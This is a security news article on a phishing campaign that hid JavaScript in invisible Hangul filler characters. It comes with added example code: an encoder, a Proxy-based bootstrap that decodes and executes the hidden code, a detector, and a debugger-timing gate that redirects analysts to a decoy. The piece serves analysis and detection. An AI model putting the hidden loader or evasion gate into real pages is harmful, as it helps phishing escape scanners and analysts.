
The attack took place in early January 2025 and was fairly sophisticated: the attackers held non-public personal information about their targets, and the phishing links were wrapped in several nested layers of Postmark tracking redirects to conceal the final destination.
The obfuscation technique used in this attack was first described in October 2024 by Martin Kleppe, a well-known JavaScript developer best known for the JSFuck project.
The encoding uses two Unicode filler characters, HALFWIDTH HANGUL FILLER (U+FFA0) and HANGUL FILLER (U+3164), to represent the bit values 0 and 1 respectively. In the payload, each group of eight such characters encodes one byte, that is one ASCII character of the hidden code.
The obfuscated code is stored as a property of a JavaScript object, and because the filler characters render as blank space, the payload is invisible in an editor or code viewer. That is also what makes such attacks hard to detect: a scanner sees what looks like empty space and has no keyword or string literal to match on.

According to Juniper Threat Labs, the payload is executed by a short bootstrap: when the hidden property is accessed, a Proxy get() trap fires, and a JavaScript function takes the string of Hangul filler characters and reconstructs the original JavaScript code from it.
In addition, the attackers layer further obfuscation on top of this, including base64 encoding and anti-debugging checks, to hinder analysis.
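As an added example (this is not code from the campaign, from JSFuck or from Juniper's report), the following JavaScript reproduces the encoding described above, a Proxy get() trap that decodes the property name it is accessed with, and a scanner that flags runs of filler characters in source text. The `minBytes` threshold, the helper names and the sample source are assumptions constructed for the example.

```javascript
// Added example, not code from the campaign, from JSFuck or from Juniper's
// report. It reproduces the encoding described above and adds a detector.
const ZERO = '\uFFA0'; // HALFWIDTH HANGUL FILLER, stands for bit 0
const ONE = '\u3164';  // HANGUL FILLER, stands for bit 1

// Encode an ASCII string as eight filler characters per byte, MSB first.
function encodeInvisible(src) {
  let out = '';
  for (const ch of src) {
    const code = ch.charCodeAt(0);
    if (code > 0x7f) throw new Error('ASCII payloads only');
    for (let bit = 7; bit >= 0; bit--) {
      out += ((code >> bit) & 1) ? ONE : ZERO;
    }
  }
  return out;
}

// Reverse the encoding. Anything that is not a whole number of bytes built
// from exactly the two filler characters is rejected rather than guessed at.
function decodeInvisible(hidden) {
  if (hidden.length % 8 !== 0) throw new Error('payload is not byte aligned');
  let out = '';
  for (let i = 0; i < hidden.length; i += 8) {
    let byte = 0;
    for (let j = 0; j < 8; j++) {
      const c = hidden[i + j];
      if (c !== ZERO && c !== ONE) throw new Error('unexpected character in payload');
      byte = (byte << 1) | (c === ONE ? 1 : 0);
    }
    out += String.fromCharCode(byte);
  }
  return out;
}

// Bootstrap of the kind the report describes: the Proxy's get() trap treats the
// *name* of the property being accessed as the hidden payload, decodes it and
// hands the recovered source to `sink`. In a real sample the sink is eval-like
// and the access is written as `carrier.` followed by the filler characters,
// which a code viewer renders as `carrier.` followed by nothing.
function makeCarrier(sink) {
  return new Proxy({}, {
    get(_target, key) {
      return sink(decodeInvisible(String(key)));
    },
  });
}

// Round trip through the trap with a harmless payload; returns 42.
function runBootstrapDemo() {
  const carrier = makeCarrier((code) => Function(code)());
  return carrier[encodeInvisible('return 6 * 7')];
}

// Detection: flag runs of filler characters long enough to carry a payload and
// show what they decode to. `minBytes` is an assumed threshold; a few bytes
// keeps stray fillers in legitimate Korean text from being reported.
function findInvisiblePayloads(source, minBytes = 4) {
  const hits = [];
  for (const m of source.matchAll(/[\uFFA0\u3164]+/g)) {
    const bytes = Math.floor(m[0].length / 8);
    if (bytes < minBytes) continue;
    const preview = decodeInvisible(m[0].slice(0, bytes * 8)).slice(0, 40);
    hits.push({ offset: m.index, bytes, preview });
  }
  return hits;
}

// Constructed sample file (not a captured script): ordinary code with one
// object key made entirely of filler characters.
const SAMPLE_SOURCE =
  'const cfg = { retries: 3, ' +
  JSON.stringify(encodeInvisible('alert(document.domain)')) +
  ': 1 };\nconsole.log(cfg.retries);\n';

console.log(runBootstrapDemo());
console.log(findInvisiblePayloads(SAMPLE_SOURCE));
```

The scanner deliberately matches on the two specific code points rather than on a generic "invisible character" class: U+FFA0 and U+3164 are not whitespace in Unicode terms, so a whitespace-normalising linter or minifier passes them through untouched, which is exactly why the trick survives into production pages.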

“The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website,” – Juniper Threat Labs.
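The timing-based debugger check described in the quote above, as an added example that is not the campaign's own script: the `debugger` statement only pauses when developer tools are attached, so a long stall around it is taken as evidence of analysis and the script steers to a decoy instead of the phishing page. The threshold, the decoy URL and the function names are assumptions.

```javascript
// Added example, not the attackers' code: measure how long execution stalls on a
// `debugger` statement. With no DevTools attached it is a no-op and the stall is
// close to zero; when an analyst steps through it, the pause is seconds long.
function measureDebuggerStall() {
  const start = Date.now();
  debugger; // pauses only when a debugger is attached
  return Date.now() - start;
}

// The abort policy, kept pure so it can be tested without a debugger: a stall
// above `thresholdMs` means abandon the attack and send the visitor somewhere
// harmless. `thresholdMs` and the decoy URL are assumptions for this example.
function decideNextHop(stallMs, realTarget, decoy = 'https://example.com/', thresholdMs = 100) {
  return stallMs > thresholdMs ? decoy : realTarget;
}

// Glue that a page would call before revealing the real landing page, e.g.
// location.replace(antiDebugGate(realTarget)).
function antiDebugGate(realTarget) {
  return decideNextHop(measureDebuggerStall(), realTarget);
}

console.log(antiDebugGate('https://phish.invalid/login'));
```

For analysis, this is also the tell: a `debugger` statement bracketed by two `Date.now()` (or `performance.now()`) reads, followed by a redirect, is a strong static indicator even before the obfuscated payload is decoded.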
Juniper Threat Labs also notes that two domains used in this campaign were previously linked to the Tycoon 2FA phishing kit. If that link holds, the obfuscation technique described above could quickly spread among cybercriminals.

2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains
watchTowr found a large number of abandoned Amazon S3 buckets that attackers could use to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…
2025.02.12 — 2.8 million IP addresses used to brute-force network devices
The Shadowserver Foundation warns of a massive web login brute-forcing campaign originating from nearly 2.8 million IP addresses per day. Unknown attackers are seeking…
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables a remote, authenticated attacker with low privileges to escalate to administrative privileges. The vulnerability…
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store
According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…
2025.02.07 — 768 vulnerabilities were exploited by hackers in 2024
According to VulnCheck, 768 CVEs were recorded as exploited in real-world attacks in 2024. This is 20% more than in 2023, when 639 vulnerabilities were exploited. Interestingly,…
2025.02.20 — Newly-discovered vulnerabilities in OpenSSH open the door to MiTM and DoS attacks
OpenSSH fixed two vulnerabilities that could enable MiTM and denial of service (DoS) attacks. Interestingly, one of these bugs has been in the code for more than 10…
2025.01.23 — Fake Telegram CAPTCHA forces users to run malicious PowerShell scripts
Hackers used the news of Ross Ulbricht's pardon to lure users to a rogue Telegram channel, where they are tricked into running malicious PowerShell code. This…
2025.02.03 — PyPI introduces a project archival system to combat malicious updates
The Python Package Index (PyPI) has introduced a new project archival system: a project can now be archived to notify users that it is not expected to be updated…
2025.03.07 — YouTube warns of scam video featuring its CEO
According to YouTube, scammers use an AI-generated video of the company's CEO in phishing attacks to steal user credentials. The scammers attack content creators by sending them…
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…